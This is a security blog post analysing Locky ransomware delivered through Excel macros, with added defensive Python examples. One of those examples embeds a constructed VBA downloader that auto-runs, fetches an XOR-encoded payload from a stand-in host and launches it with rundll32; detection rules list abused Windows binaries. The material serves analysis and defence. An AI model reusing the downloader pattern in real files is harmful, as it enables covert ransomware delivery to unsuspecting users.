The ransomware risks in office files

Posted by: Orhan Sari. Category: Cyber-security Awareness, Information Security, Malware. Post Date: November 2, 2017


Free phishing test: Keep your employees aware of the Ransomware threats

Ransomware has been a nightmare for individuals and institutions for the last two years; the current wave was first seen in September 2013. It is a dangerous class of trojan horse whose purpose is extortion. Initially confined to Microsoft Windows, ransomware has since also been implemented for Android devices and Mac computers. Moreover, as a new attack vector, we now see ransomware delivered through Office files.

Ransomware is usually delivered as an e-mail attachment. Once run, it encrypts certain file types on the local disks and on any network shares it can reach, and the user is then told that the files will not be decrypted unless a ransom is paid. In other words, it is a cryptovirology attack that holds the victim's files hostage and demands a payment to restore them. Some variants add a deadline and threaten that, if the ransom is not paid in time, the encrypted files will never be decrypted or restored.

Ransomware in Office Files

Ransomware is most commonly spread by e-mails carrying fake electronic invoices. Keep in mind, however, that attackers keep developing new ways to deliver the infection; in recent weeks we have seen macros in Office files used as a new one.

Why Macros?

Office files are used by accountants and information workers across the business world to build and automate frequently repeated tasks. Because macros can run code and issue instructions, attackers typically abuse them as a delivery mechanism. Malicious macro code stored in an Excel, Word or similar file can be used to install malware that encrypts the data and then demands a ransom for it.

The inadequacy of Cyber Security Technology

The commonly used antivirus and sandbox products are, to a large extent, ineffective against new-generation ransomware. The main reason is that these samples constantly change their file signature (new builds are repacked so that their hashes differ), so signature-based and static analysis cannot recognise them.

Malware developers and attackers can also circumvent heuristic and behaviour-based automated analysis with evasion methods of their own. In some cases we see that these technologies are late in discovering new malware.


An example of Ransomware

In the following example we share our analysis of an e-mail that arrived in our inbox:

You may receive an e-mail with a subject you never expected, from a person you never expected, that you nevertheless believe concerns you. Such a malicious e-mail may imitate an acquaintance or a source you do expect mail from. We begin our analysis with the e-mail trick itself, recalling that it is possible to send an e-mail on someone else's behalf: the visible sender address is chosen by whoever sends the message and is no guarantee of who actually sent it.

Picture – 1 “An e-mail sample with a malicious Excel file attached”
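The e-mail trick above (a message sent on someone else's behalf, carrying an Office attachment) can be checked before anyone opens the attachment. The script below is an added example and is not part of the original post: it parses a raw message, compares the visible From: domain with the envelope sender in Return-Path: and with Reply-To:, looks for the invoice/cargo lure words, and flags attachments in formats that can carry VBA macros. The message, its addresses and the attachment name are constructed for the example.

```python
"""Triage an incoming e-mail for the lure pattern described above.

Added example, not from the original post. RAW_EMAIL is a constructed
message: sender, domains and attachment name are made up and the
attachment body is a dummy string.
"""
import email
import os
from email import policy
from email.utils import parseaddr

# Formats that can carry VBA macros. Modern .xlsx/.docx cannot.
MACRO_CAPABLE = {".xls", ".xlsm", ".xlsb", ".xlam", ".doc", ".docm",
                 ".dot", ".dotm", ".pptm", ".ppam"}
# Lure words typical of the invoice- and cargo-themed campaigns.
LURE_WORDS = ("invoice", "bill", "payment", "cargo", "shipment", "receipt")

RAW_EMAIL = """\
Return-Path: <bounce-44@mailer.example.net>
From: Accounts Payable <accounts@partner-corp.example>
Reply-To: <no-reply@mailer.example.net>
To: victim@corp.example
Subject: Invoice 2017-1342 - payment due
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain; charset="utf-8"

Please find attached the invoice for last month.

--XYZ
Content-Type: application/vnd.ms-excel
Content-Disposition: attachment; filename="Invoice_2017_1342.xls"
Content-Transfer-Encoding: base64

ZHVtbXk=
--XYZ--
"""


def domain_of(header_value):
    """Lower-cased domain of the first address in a header, or None."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else None


def triage(raw):
    """Return a list of indicator strings found in the raw message text."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    from_dom = domain_of(msg.get("From"))
    envelope_dom = domain_of(msg.get("Return-Path"))
    reply_dom = domain_of(msg.get("Reply-To"))
    # A visible From: that does not match the envelope sender is the
    # "sent on someone else's behalf" pattern. Legitimate mailing services
    # do this too, so it is an indicator, not proof.
    if from_dom and envelope_dom and from_dom != envelope_dom:
        findings.append(f"from/envelope mismatch: {from_dom} vs {envelope_dom}")
    if from_dom and reply_dom and from_dom != reply_dom:
        findings.append(f"from/reply-to mismatch: {from_dom} vs {reply_dom}")
    subject = str(msg.get("Subject") or "").lower()
    hits = [w for w in LURE_WORDS if w in subject]
    if hits:
        findings.append("lure subject: " + ", ".join(hits))
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if os.path.splitext(name)[1].lower() in MACRO_CAPABLE:
            findings.append(f"macro-capable attachment: {name}")
    return findings


if __name__ == "__main__":
    for finding in triage(RAW_EMAIL):
        print("[!]", finding)
```

A From/Return-Path mismatch is an indicator, not proof; at the gateway the same question is answered properly by SPF, DKIM and DMARC, and this check is the analyst's manual version of it.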

An Example of Malicious Software Analysis

In general, the malware known as “Locky Ransomware”, seen in Picture – 1, is sent to the victim by e-mail. When the victim downloads the Excel file from the e-mail, opens it and enables macros (in the default Office configuration they are blocked until the user clicks through the warning), the macros in the Excel file run and the malware starts its work through them.

In this example, we notice that to make the file name convincing it carries a corporate name. As in the earlier invoice-themed ransomware examples we have seen, the invoice names are carefully chosen to enhance credibility.

Picture – 2 “To make the file name convincing, it uses templates found in corporate environments.”

When we analyze the macro in Picture – 2, we see that it starts by downloading an encrypted payload from a server on the Internet to the computer.

Picture – 3 “Download address of the malicious code fragments”

Functionality of the Macro

Because of what macros can do, Office files in Excel or Word format had already become one of the most effective vehicles of abuse in cyber-attacks; ransomware in Office files is therefore one of the significant threats. When we examine the macros in the malicious Excel file, we notice that encrypted content is downloaded from the Internet, decrypted and then run.

The malware developer did not obfuscate the code in this case. As can be seen in Picture – 2, part of the code downloads the stage that encrypts your data and then runs it: the macro fetches a piece of code that will encrypt the files on the victim's computer, decrypts it, and executes it. Keeping the payload encrypted in transit and on disk until the moment it runs is what defeats a static scan of the download, since the scanner never sees the decrypted executable.

Picture – 4 “The Locky macro first downloads the piece of code in encrypted form.”

The downloaded content is decrypted into a DLL named siluans.dll and written to the %USERPROFILE%\temp folder. We see that this is a standard method ransomware uses, and with this injection method the encryption process is initiated, as shown in Pictures 4 and 5.
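The chain described above (download an encrypted blob, decode it, drop it as %USERPROFILE%\temp\siluans.dll and hand it to rundll32) as an added static-triage example. This is not code from the original post and not the sample's own macro: the VBA text below is constructed to mirror the behaviour the analysis describes, the download URL, the single-byte XOR key 71 and the fake DLL image are made up, and the real sample's decryption routine is not reproduced. The script pulls the indicators, URL, key and export name out of the macro source, shows that a signature check on the downloaded blob finds no PE header, and then recovers the executable with the key from the macro or, failing that, by brute-forcing the byte against the MZ/PE header as known plaintext.

```python
r"""Static triage of a downloader macro and recovery of its payload.

Added example, not code from the original post and not the Locky sample's
own macro. VBA_SAMPLE is constructed to mirror the behaviour described in
the analysis; the URL, the XOR key 71 and FAKE_DLL are made up, and the
real sample's decryption routine is not reproduced here.
"""
import re

# Constructed stand-in for the macro seen in the screenshots (assumption:
# a byte-wise Xor with a constant; the real routine may differ).
VBA_SAMPLE = r'''
Sub Auto_Open()
    Dim u As String, p As String
    u = "http://payload.example.invalid/img/1.png"
    p = Environ("USERPROFILE") & "\temp\siluans.dll"
    Fetch u, p
    Shell "rundll32.exe " & p & ",qwerty", vbHide
End Sub

Sub Fetch(u As String, p As String)
    Dim h, b, i
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", u, False
    h.Send
    b = h.responseBody
    For i = 0 To UBound(b)
        b(i) = b(i) Xor 71
    Next i
    ' writing b to p with ADODB.Stream omitted
End Sub
'''

# Patterns an analyst greps a suspicious macro for.
INDICATORS = {
    "auto-run entry point": r"\bAuto_Open\b|\bWorkbook_Open\b|\bDocument_Open\b",
    "HTTP download object": r"MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|URLDownloadToFile",
    "drop path under user profile": r'Environ\("USERPROFILE"\)',
    "rundll32 execution": r"rundll32(\.exe)?\s",
    "byte-wise Xor decode loop": r"\bXor\s+\d+",
}


def extract_indicators(vba):
    """Names of the indicator patterns present in the macro source."""
    return [name for name, pat in INDICATORS.items() if re.search(pat, vba)]


def extract_url(vba):
    m = re.search(r'"(https?://[^"]+)"', vba)
    return m.group(1) if m else None


def extract_xor_key(vba):
    m = re.search(r"\bXor\s+(\d+)", vba)
    return int(m.group(1)) if m else None


def extract_export(vba):
    """Export name passed to rundll32 as "<dll>,<export>"."""
    m = re.search(r'"\s*,\s*(\w+)\s*"', vba)
    return m.group(1) if m else None


# Constructed fake DLL image: MZ header, e_lfanew pointing at a PE
# signature, and the export name. Enough for header checks, not a real DLL.
FAKE_DLL = (b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little")
            + b"PE\x00\x00" + b"\x00" * 20 + b"qwerty\x00")


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


# What the download URL would serve: the image XOR-ed with the macro's key.
ENCRYPTED_BLOB = xor_bytes(FAKE_DLL, 71)


def looks_like_pe(data):
    """True if data has an MZ header and a PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    off = int.from_bytes(data[0x3C:0x40], "little")
    return data[off:off + 4] == b"PE\x00\x00"


def recover_payload(blob, key=None):
    """Decode with the key taken from the macro, or brute-force the single
    byte using the MZ/PE header as known plaintext. Returns (key, bytes)
    or (None, None)."""
    keys = [key] if key is not None else range(256)
    for k in keys:
        pt = xor_bytes(blob, k)
        if looks_like_pe(pt):
            return k, pt
    return None, None


if __name__ == "__main__":
    print("indicators:", extract_indicators(VBA_SAMPLE))
    print("download URL:", extract_url(VBA_SAMPLE))
    print("PE signature visible in downloaded blob:", looks_like_pe(ENCRYPTED_BLOB))
    key, dll = recover_payload(ENCRYPTED_BLOB, extract_xor_key(VBA_SAMPLE))
    print("decoded with key", key, "header", dll[:2], "export", extract_export(VBA_SAMPLE))
    print("brute-forced key without the macro:", recover_payload(ENCRYPTED_BLOB)[0])
```

The brute force works only because the plaintext starts with a known header and the scheme is a single byte wide; a real sample with a longer key or a stream cipher still yields to the same idea (decode exactly as the macro does) but not to 256 guesses, which is why the decode routine is the part of the macro worth reading first.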


Picture – 5 “Injection method”

Picture – 6 “DLL injection method”

The Malicious Macro Code in the Excel File Passes into Another Phase

In Picture – 6 we see the malicious macro code contained in the Excel file pass into another phase: with the macro's help, the DLL that Locky Ransomware requires is loaded with Rundll32.exe, which calls its exported function named qwerty. A DLL run this way executes inside a signed Windows binary, so a process list shows only rundll32.exe and not the dropped file.

Picture – 7 “Rundll32.exe qwerty function”

When we analyze the Siluans.dll file, the command-and-control server it contacts to obtain the encryption keys, and the file I/O activity performed during the encryption process, can be seen in Pictures 7, 8 and 9.
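The rundll32 stage above is what endpoint telemetry records, so here is an added detection example (not from the original post) that runs two rules over process-creation events: an Office application spawning a living-off-the-land binary, and rundll32 loading a DLL from a user-writable path such as the %USERPROFILE%\temp drop location. The three events are constructed to resemble Sysmon Event ID 1 fields; all paths, user names and command lines are made up.

```python
"""Detection rules for the rundll32 stage, run over process-creation events.

Added example, not from the original post. EVENTS is constructed to
resemble Sysmon Event ID 1 fields (Image, ParentImage, CommandLine);
every path, user name and command line is made up.
"""
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Signed Windows binaries commonly abused to run dropped code.
LOLBINS = {"rundll32.exe", "regsvr32.exe", "powershell.exe", "cmd.exe",
           "wscript.exe", "cscript.exe", "mshta.exe", "certutil.exe"}
# Path fragments a DLL loaded by rundll32 should normally never come from.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")

EVENTS = [
    {  # constructed: Excel launching the dropped DLL, as in the analysis
        "ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\rundll32.exe",
        "CommandLine": r"rundll32.exe C:\Users\alice\temp\siluans.dll,qwerty",
    },
    {  # constructed: benign Control Panel launch from the shell
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\rundll32.exe",
        "CommandLine": r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL',
    },
    {  # constructed: a Word macro spawning a shell instead of rundll32
        "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c echo hi",
    },
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_rundll32(cmdline):
    """Split 'rundll32.exe <dll>,<export> ...' into (dll, export); None otherwise."""
    parts = cmdline.strip().split(None, 1)
    if len(parts) < 2 or basename(parts[0].strip('"')) != "rundll32.exe":
        return None
    dll, _, rest = parts[1].strip().partition(",")
    export = rest.split()[0] if rest.strip() else ""
    return dll.strip().strip('"'), export


def analyze(event):
    """Return the rule descriptions that fire for one event."""
    findings = []
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    # Rule 1: an Office application should not be launching these binaries.
    # This also catches droppers that use powershell or mshta instead.
    if parent in OFFICE_APPS and image in LOLBINS:
        findings.append(f"{parent} spawned {image}")
    # Rule 2: rundll32 loading a DLL from a user-writable location.
    parsed = parse_rundll32(event["CommandLine"])
    if parsed:
        dll, export = parsed
        if any(marker in dll.lower() for marker in USER_WRITABLE):
            findings.append(f"rundll32 loaded {dll} from a user-writable path, "
                            f"export '{export or '?'}'")
    return findings


def scan(events):
    """(index, findings) for every event that triggers at least one rule."""
    flagged = []
    for i, event in enumerate(events):
        findings = analyze(event)
        if findings:
            flagged.append((i, findings))
    return flagged


if __name__ == "__main__":
    for i, findings in scan(EVENTS):
        for finding in findings:
            print(f"event {i}: {finding}")
```

Rule one also fires on the cmd.exe case, which is the generalization beyond this sample: a macro dropper that runs PowerShell or mshta instead of rundll32 still trips it, while the explorer-launched Control Panel applet is left alone.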

Picture – 8 “Key access”

Picture – 9 “Encrypted files are written back to disk with a unique sequence number and an .odin extension”

We see that the malware author uses a unique sequence number per file; that is to say, together with a per-file payment option, it improves the restore (decryption) functions.

Picture – 10 “A plain-text channel is preferred for the encryption key”

In Picture – 10 we see that a plain-text channel is used for the encryption key; in short, the author did not feel the need for an additional layer of security around the key exchange. For a defender this means that whatever key material crossed the wire is visible to anyone who captured that traffic.

Picture – 11 “The standard welcome screen is seen after the encryption process”

In Picture – 11 the welcome screen shown once the encryption process has completed is seen. We have determined how the ransomware acts through the macro in the Excel file, how the piece of code required for encryption is fetched from a server on the Internet, how the master key is sent to the server, how a message is delivered to the victim after encryption has completed and, as always, how it demands a ransom.

Picture – 12 “Our encrypted files can only be recovered via a channel established through the Tor browser.”

As can be seen in the content of the message, in order to obtain decryption the attacker lists the ransom payment procedure, which runs over the Tor network.

Solution Proposals against Ransomware in Office Files

In short, as a result of our analysis of ransomware in Office files, we offer the following individual and institutional solutions.

Individual solutions

  • Tighten your antispam and antivirus protection, bearing in mind that these attacks are mainly carried out via e-mail or similar channels.
  • Use heuristic (behaviour-based) protection on your personal computer.
  • Disable macros in Office files whose source you do not trust; in the default Office configuration macros are already blocked until you enable them, so do not click “Enable Content” on a file you did not expect.
  • Do not open attachments from people you do not know!
  • Treat suspicious invoice- or cargo-themed e-mails with the same caution.

Institutional solutions

  • Strengthen your antispam gateway solution and apply it against known ransomware threats.
  • Measure your employees against these phishing attacks with simulated tests, then give targeted training to specific individuals and groups.
  • Ransomware domain intelligence (blocking known ransomware download and command-and-control domains) is a healthy way to reduce the risk; make use of such services.

The analysis can also be found in PDF format on our Slideshare account.

Register and measure your company’s risk against cyber attacks for free on Keepnetlabs.


